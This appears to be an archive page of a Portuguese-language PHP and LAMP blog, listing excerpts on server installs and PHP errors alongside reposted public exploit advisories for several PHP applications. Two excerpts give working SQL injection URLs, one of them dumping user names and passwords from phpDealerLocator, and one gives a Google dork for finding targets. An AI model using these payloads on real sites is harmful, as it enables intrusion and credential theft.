Como anda o PHP moderno?

03/03/2020 0 Comments

Post retirado da resposta do Marcelo dos Santos: Galera, achei o episódio sobre PHP Moderno excelente. Os convidados também foram escolhidos a dedo. São excelentes profissionais, fazem muito pela comunidade e tenho a honra de ser amigo de todos eles. Só acho que faltou escolher alguém de Laravel para balancear essa discussão aí. 😛 O …

How to Solve unexpectedly Error 500 (Timeout) PHP + FastCGI + IIS 7 (Windows 7/8/10/2008/2012 server)

31/07/2018 0 Comments

I could found some links that could help you. The problem is the activityTimeout of your cgi module. Increase fastCgi / PHP activityTimeout in IIS7 FastCGI timeout value change For my, works in summary this. Open the dos console “cmd” and go to c:\windows\system32\inetsrv\ then, execute this command, changing the path of your php-cgi. appcmd set config -section:system.webServer/fastCgi “-[fullPath=’C:\php\php-cgi.exe’].activityTimeout:3600”

Novo Job: WebKing Hospedagem de Sites

26/06/2012 0 Comments

Depois de muitos dias sem postar venho por meio deste mostrar o último trabalho realizado:   webking.com.br   Trata-se de uma empresa de Hospedagem de Sites. Em breve detalho as ferramentas usadas neste job.

PHP Warning: Module 'timezonedb' already loaded in Unknown on line 0

05/03/2012 0 Comments

Para resolver isto é simples, entre no arquivo php.ini (em rhel based pode ser encontrado em /usr/local/lib/php.ini), bastando apenas entrar e remover as linhas duplicadas que contém: extension=”timezonedb.so” Removendo as linhas duplicadas rode: service httpd restart ou /etc/init.d/apache2 restart e curta!

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

27/02/2012 0 Comments

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro: Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as …

PmWiki

23/11/2011 0 Comments

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be …

PHP-Nuke

23/11/2011 0 Comments

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # …

Como remover caracteres ^M de arquivos usando VIM/VI (vale para qualquer UNIX-like)

27/09/2011 0 Comments

Bom, galera, quem aqui nunca abriu um arquivo no console que apresentou caracteres ^M? Normalmente essas pragas aparecem ou com o Dreamweaver ou com Word (cópia) – Área de Transferência, depois os caras costumam enviar por ftp e daí já sabe né? Se abrir o arquivo via console tá lá a praga! Bem, a dica …

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

25/09/2011 6 Comments

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION …

Mysql não aceita senha de root no Mac os X Lion, o que fazer? (serve para o snow leopard)

25/09/2011 0 Comments

Bom, pessoal, nós do app gostaríamos de detalhar algo. NÃO precisa ter senha de root para operar o mysql, isto dá-se em detrimento ao poder de root, porém com certas restrições que cada usuário do sistema possui. Se eu quiser entrar no mysql para criar base de dados e trabalhar com o bd (após seguir …

WordPress Event Registration plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …

Como instalar Nginx PHP5 e Mysql no CentOS 5.6

08/08/2011 0 Comments

A pronúncia correta do Nginx é “engin-ex”, mas vamos nos ater aos comandos que é o melhor que podemos fazer, né? NÃO sem antes falar que essa besteirinha segura “somente” milhões de acessos por dia ao site WordPress, por isso CONFIE e USE nginx sem QUALQUER medo! (existe plugin pago e grátis para o Cpanel, …

MyBB MyTabs (plugin) 0day SQL injection vulnerability

08/08/2011 0 Comments

===================================================================== MyBB 0day MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 08 2011 # Tested on : Windows XP , Linux # Category : web apps # …

Como instalar PHP, Apache e Mysql no Mac Os X Snow Leopard (mamp2 no mac)

04/08/2011 30 Comments

Este é um artigo daqueles “easy-to-use”, aonde instalaremos o apache 2, o php 5 e o mysql 5 para que possamos programar sossegadamente (fazer um webserver para hospedar nossa aplicação localmente). O sistema operacional usado aqui foi o Mac Os X Snow Leopard 10.6.7, mas o procedimento é o mesmo para 10.6.8. Vamos para o …

Como instalar php apache mysql phpmyadmin no Centos 6

15/07/2011 31 Comments

Olá pessoal, como vocês sabem somos fanáticos pelo ambiente LAMP e agora iremos colocar para vocês um how to simples porém funcional de como instalar o apache, mysql, php e phpmyadmin na plataforma CentOs 6. Vamos começar deixando tudo atualizado e corrigido: [root@appunixlabs ~]# yum clean all && yum update -y Agora vamos instalar o …

Portix-CMS 1.5.0. rc5 Local File Inclusion Vulnerability

11/07/2011 0 Comments

-==================== in The Name Of aLLah ====================- # Title: Portix-CMS 1.5.0. rc5 Local File Inclusion # Google Dork: inurl:livriel.php?livriel= # Date: n/a # Author: Or4nG.M4n # Link: http://www.easy-script.com/scripts-PHP/portix-cms-150-rc5-3005.html # Version: v1.5.0. rc5 # Tested on: windows 8 # Home : 1337r1z.wordpress.com | sec4ever.com | Tryag.cc | cc.7rs.org ~ ( Exploit Local File ) ~ 1 …

phpMyAdmin 3.x Swekey Remote Code Injection Exploit

11/07/2011 0 Comments

. , ) . . ,/) , / ) , ) )( /)/( (__( /( / ) __ __ ________ __ __ / ( )| |) / | | /| | | | | | | | (__) ( ______ / | |_____( ______ | | / | | __ __ | |__| | ___| …

Como instalar Apache, PHP, MySQL, Phpmyadmin e MemCached no FreeBSD 7

04/07/2011 0 Comments

Vamos começar instalando o Mysql. Precisamos entrar na pasta do mysql: cd /usr/ports/databases/mysql51-server Vamos preparar a arquitetura de updates: make BUILD_OPTIMIZED=yes BUILD_STATIC=yes Na mesma pasta vamos instalar o mysql: make install clean Precisamos ativar o Mysql como serviço iniciado no momento do boot. Para isto devemos adicionar ao final do arquivo /etc/rc.conf o seguinte: mysql_enable=”YES” …

phpDealerLocator Multiple SQL Injection Vulnerabilities

04/07/2011 0 Comments

# Exploit Title: phpDealerLocator – Multiple SQL Injection vulnerabilities # Date: 7/3/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: phpdealerlocator.yourphppro.com # Tested on: [Linux/Windows 7] #Vulnerable Parameters: record.php?Dealer_ID= record_country.php?Dealer_ID= results_latlong.php?s_Latitude= results_latlong.php?s_Longitude= results_latlong.php?s_Dealer_Radius= results_phone.php?s_Dealer_Radius= results_radius.php?s_Dealer_Radius= ############################################################## PoC: http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users– ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew Fonte: http://www.exploit-db.com/exploits/17477/

PhpFood CMS v2.00 SQL Injection Vulnerability

04/07/2011 0 Comments

############################################################################################################# ## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 3 July, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.phpfood.com/ [+] Download : http://www.phpfood.com/download.html [+] version : 2.00 or lower maybe also affected [+] Vulnerability …